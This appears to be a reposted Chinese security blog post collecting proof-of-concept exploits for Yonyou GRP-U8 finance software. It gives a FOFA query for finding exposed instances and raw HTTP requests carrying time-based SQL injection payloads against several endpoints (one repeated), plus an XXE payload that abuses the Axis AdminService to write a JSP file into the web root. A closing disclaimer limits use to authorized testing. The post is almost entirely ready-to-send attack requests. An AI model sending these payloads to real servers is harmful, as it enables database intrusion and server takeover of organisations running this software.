用友一波POC/EXP

2024年4月29日11:30:38评论16 views字数 4731阅读15分46秒阅读模式

用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞

fofa

app="用友-GRP-U8"

poc

GET /u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm=&kjnd= HTTP/1.1
Host: xxxxxx
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞

poc

GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'-- HTTP/1.1
Host: 
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=06D017067FC6F3BFA6150315042277B6
x-forwarded-for: 127.0.0.1
Connection: clo

用友GRP-U8-ufgovbank存在XXE漏洞

poc

POST /ufgovbank HTTP/1.1
Host: 172.16.135.21:8009
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1158

reqData=%3C%3Fxml%20version%3D%221.0%22%3F%3E%0A%3C%21DOCTYPE%20foo%20SYSTEM%20%22http%3A%2F%2F127.0.0.1%3A8009%2Fservices%2FAdminService%3Fmethod%3D%21--%253E%253Cdeployment%2520xmlns%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252F%2522%2520xmlns%253Ajava%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252Fproviders%252Fjava%2522%253E%253Cservice%2520name%253D%2522OpenTaske%2522%2520provider%253D%2522java%253ARPC%2522%253E%253CrequestFlow%253E%253Chandler%2520type%253D%2522java%253Aorg.apache.axis.handlers.LogHandler%2522%2520%253E%253Cparameter%2520name%253D%2522LogHandler.fileName%2522%2520value%253D%2522C:UFGOVU8webappsbx_cxjk_list.jsp%2522%2520%252F%253E%253Cparameter%2520name%253D%2522LogHandler.writeToConsole%2522%2520value%253D%2522false%2522%2520%252F%253E%253C%252Fhandler%253E%253C%252FrequestFlow%253E%253Cparameter%2520name%253D%2522className%2522%2520value%253D%2522java.util.Random%2522%2520%252F%253E%253Cparameter%2520name%253D%2522allowedMethods%2522%2520value%253D%2522*%2522%2520%252F%253E%253C%252Fservice%253E%253C%252Fdeployment%22%3E&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

用友GRP-U8-userInfoWeb存在SQL注入

poc

POST /services/userInfoWeb HTTP/1.1
Cache-Control: max-age=0
Origin: null
DNT: 1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.16.135.132:8009
Content-Length: 558

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:3'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

用友GRP-U8-userInfoWeb存在SQL注入

poc

POST /services/userInfoWeb HTTP/1.1
Cache-Control: max-age=0
Origin: null
DNT: 1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.16.135.132:8009
Content-Length: 558

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:3'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用，公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击，公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流，不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。
原文始发于微信公众号（TKing的安全圈）：用友一波POC/EXP

左青龙
微信扫一扫

右白虎
微信扫一扫

用友一波POC/EXP

用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞

fofa

poc

用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞

poc

用友GRP-U8-ufgovbank存在XXE漏洞

poc

用友GRP-U8-userInfoWeb存在SQL注入

poc

用友GRP-U8-userInfoWeb存在SQL注入

poc

【漏洞复现】佳会视频会议attachment接口处存在任意文件读取漏洞

Apache-OFBiz-目录遍历漏洞利用【附Poc】

漏洞预警 | 金和OA C6 任意文件读取漏洞

漏洞预警 | 用友U8Cloud XXE漏洞

漏洞预警 | 福建科立讯通信指挥调度管理平台SQL注入漏洞

漏洞复现 | 大华ICC智能物联综合管理平台fastjson漏洞【附poc】

【0day】全智能停车视频收费系统WebServiceToAndroid存在任意文件上传漏洞

飞鱼星企业级智能上网行为管理系统 send_order.cgi 任意命令执行

亿赛通电子文档安全管理系统-File Read

(0day)WVP-GB28181摄像头管理平台存在敏感信息泄露

发表评论

在线咨询

微信